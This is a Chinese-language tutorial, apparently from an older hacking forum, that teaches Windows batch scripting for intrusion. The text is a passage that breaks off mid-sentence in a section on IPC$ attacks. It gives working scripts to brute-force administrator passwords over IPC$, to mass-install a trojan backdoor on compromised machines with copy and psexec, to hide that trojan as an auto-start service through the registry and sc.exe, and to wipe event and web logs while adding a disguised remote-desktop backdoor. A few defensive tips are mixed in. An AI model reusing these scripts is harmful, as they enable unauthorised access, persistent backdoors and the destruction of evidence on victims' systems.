Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end


:defrag
c:/dos/defrag
goto end
:mem
mem
goto end
:end
echo good bye


此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作

出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行

标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将

显示good bye,文件结束。
9.If 命令


if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串"  待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等

号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms


2、if exist 文件名  待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys


3、if errorlevel / if not errorlevel 数字  待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2  
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返

回码为0、1。


10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable


for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I


如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:


FOR /D %variable IN (set) DO command [command-parameters]


如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。


FOR /R [[drive:]path] %variable IN (set) DO command [command-


检查以 [drive:]path 为根的目录树,指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。


FOR /L %variable IN (start,step,end) DO command [command-para


该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。


FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command


或者,如果有 usebackq 选项:


FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command


filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:


eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。


sample1:
FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command


会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来
取得第二个符号,引用 %j 来取得第三个符号,引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用 usebackq 选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。


%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或
'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;
同时不能有 52 个以上都在使用中。


您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,
用单引号将括号之间的 filenameset 括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。


最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:


FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i


会枚举当前环境中的环境变量名称。


另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:


~I - 删除任何引号("),扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串


可以组合修饰符来得到多重结果:


%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR


在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。


以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。


sample2:


利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use //ip/ipc$ "password" /u:"administrator"来尝试这和目标主机进行连

接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use //ip/ipc$ "i%"
/u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程

序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use //ip/ipc$ "i%%"
/u:"administrator"|find ":命令成功完成">>D:/ok.txt ,这样就ko了。


sample3:


你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很

开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或

重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。


主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable


@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat
%%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给

door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim

,然后用返回码(If
errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这

victim.txt里的内容是什么样的了。应该根据%%i
%%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call
IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat )
---------------------------


------------------- cut here then save as a batchfile(I call it door.bat)
-----------------------------
@net use //%1/ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe//%1/admin$/system32 && if not errorlevel 1 echo IP %1
USER %2 PWD %3 >>ko.txt
@psexec //%1 c:/winnt/system32/windrv32.exe
@psexec //%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored
>>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat)
--------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序

(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使

之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.


二.如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,

这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵

呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不

如把一些固定命令写入一个批处理,把肉鸡地ip password
username 当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echo off
@net use //1%/ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3
三.如何使用组合命令(Compound Command)


1.&


Usage:第一条命令 & 第二条命令 [& 第三条命令...]


用这种方法可以同时执行多条命令,而不管命令是否执行成功


Sample:
C:/>dir z: & dir c:/Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB


Directory of c:/Ex4rch


2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif


2.&&


Usage:第一条命令 && 第二条命令 [&& 第三条命令...]


用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如

果一直没有出错则一直执行完所有命令;


Sample:
C:/>dir z: && dir c:/Ex4rch
The system cannot find the path specified.


C:/>dir c:/Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB


Directory of c:/Ex4rch


2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.


在做备份的时候可能会用到这种命令会比较简单,如:
dir file://192.168.0.1/database/backup.mdb && copy
file://192.168.0.1/database/backup.mdb E:/backup
如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行

copy命令。这种用法可以替换IF exist了 :)


3.||


Usage:第一条命令 || 第二条命令 [|| 第三条命令...]


用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如

果没有出现正确的命令则一直执行完所有命令;


Sample:
C:/Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB


Directory of C:/Ex4rch


2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free


组合命令使用的例子:
sample:
@copy trojan.exe //%1/admin$/system32 && if not errorlevel 1 echo IP %1
USER %2 PASS %3 >>victim.txt


四、管道命令的使用


1.| 命令
Usage:第一条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。


sample:
time /t>>D:/IP.log
netstat -n -p tcp|find ":3389">>D:/IP.log
start Explorer
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面

这个bat,以获得登录用户的IP。


2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与
>>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定

文件中,而不会改动其中的内容。


sample1:
echo hello world>c:/hello.txt (stupid example?)


sample2:
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那

里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目

录下的EXE和DLL文件作一个记录:


运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马

了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和

dllback1.txt中,然后运行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt
dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到

diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版

本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好

,如果有的话也不要直接DEL掉,先用regsvr32
/u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之

彻底删除或者提交给杀毒软件公司。


3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。


No.5
五.如何用批处理文件来操作注册表


在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后

门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会

修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定

的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来

生成一个REG文件)


关于注册表的操作,常见的是创建、修改、删除。


1.创建
创建分为两种,一种是创建子项(Subkey)


我们创建一个文件,内容如下:


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]


然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft下创建了一个名

字为“hacker”的子项。


另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"Door"=C://WINNT//system32//door.exe
"Autodos"=dword:02


这样就在[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”


2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后

导入(regedit /s)即可。


3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-


执行该脚本,

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下

的"Ex4rch"就被删除了;


我们再看看删除一个子项,我们创建一个如下的脚本:


Windows Registry Editor Version 5.00


[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]


执行该脚本,

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]就已经被删

除了。


相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定

内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的

文件。


samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg


@echo
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>Sample.reg


@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C://WINNT//system32//door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg


samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/ CurrentVersion/Run(Runonce、

Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木

马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全

一些.下面以配置好地IRC木马DSNX为例(名为 windrv32.exe)


@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
>>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname=
WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll


@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将

其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.


六.精彩实例放送。
1.删除win2k/xp系统默认共享的批处理
------------------------ cut here then save as .bat  or .cmd file
---------------------------


@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off


:Rem check parameters if null show usage.
if {%1}=={} goto :Usage


:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:/delshare.reg
echo
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/lanmanserver/parameters

]>>
c:/delshare.reg
echo "AutoShareWks"=dword:00000000>> c:/delshare.reg
echo "AutoShareServer"=dword:00000000>> c:/delshare.reg
echo Nowing using the registry file to chang the system default
properties.
regedit /s c:/delshare.reg
echo Deleting the temprotarily files.
del c:/delshare.reg
goto :END


:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the
command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF


:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.


:EOF
echo end of the batch file
------------------------ cut here then save as .bat  or .cmd file
---------------------------


2.全面加固系统(给肉鸡打补丁)的批处理文件
------------------------ cut here then save as .bat  or .cmd file
---------------------------


@echo Windows Registry Editor Version 5.00 >patch.dll
@echo
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/lanmanserver/parameters

]
>>patch.dll


@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]


@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa]
>>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]


@echo
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NetBT/Parameters]
>>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]


@echo
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/@REMoteRegistry]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Schedule]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows
NT/CurrentVersion/Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]


@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll


------------------------ cut here then save as .bat  or .cmd file
---------------------------


下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service

留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:/winnt/system32/logfiles/w3svc1/*.* /f /q
@del c:/winnt/system32/logfiles/w3svc2/*.* /f /q
@del c:/winnt/system32/config/*.event /f /q
@del c:/winnt/system32dtclog/*.* /f /q
@del c:/winnt/*.txt /f /q
@del c:/winnt/*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]


@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危险的服务。]


@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal
Server/WinStations/RDP-Tcp] >>patch.dll
@echo "ortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal
Server/Wds/rdpwd/Tds/tcp >>patch.dll
@echo "ortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/SecuService]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo
"ImagePath"=hex

(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,/
>>patch.dll
@echo
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,/
>>patch.dll
@echo
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
>>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows' message。"
>>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/termservice]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:/winnt/system32/termsrv.exe c:/winnt/system32/eventlog.exe
@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog

,留条后路]

 

 

--------------------------------------
一些使用过程中的问题

IPC入侵命令大全


一 摘要
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$所使用的端口
六 ipc管道在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 关于at命令和xp对ipc$的限制
十 如何打开目标的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令
十二 入侵中可能会用到的命令
十三 对比过去和现今的ipc$入侵
十四 如何防范ipc$入侵
十五 ipc$入侵问答精选

一 摘要
注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论

之列。


二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信

而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并

以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新

功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提

供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享

(c$,d$,e$……)和系统目录 winnt或windows(admin$)共享。所有的这些,微软的初衷都

是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏

洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null

session)。那么什么是空会话呢?


三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话

将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核

实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;

如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为

正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上

的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据

WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程

中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能

让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID (它标识

了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的

SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不

能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。

那么建立空会话到底可以作什么呢?


四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问

everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用

更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问

到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来

看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口

令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了

猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用

处的说法是不正确的。以下是空会话中能够使用的一些具体命令:


1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)
命令:net use //ip/ipc$ "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各

一个空格。


2 查看远程主机的共享资源
命令:net view //ip
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共

享,可以得到如下面的结果,但此命令不能显示默认共享。

在 //*.*.*.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看远程主机的当前时间
命令: net time //ip
解释:用此命令可以得到一个远程主机的当前时间。


4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37


以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:

建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下

面我们就来看看ipc$所使用的端口是什么?


五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于

TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除

了基于NBT实现,还可以直接通过445端口实现。

有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:

对于win2000客户端(发起端)来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果

445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口

无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端

口无响应,那么会话失败。


对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
2 如果禁止NBT,那么只有445端口开放。


我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有

监听139或445端口,ipc$会话是无法建立的。


六 ipc管道在hack攻击中的意义
ipc 管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc

管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过

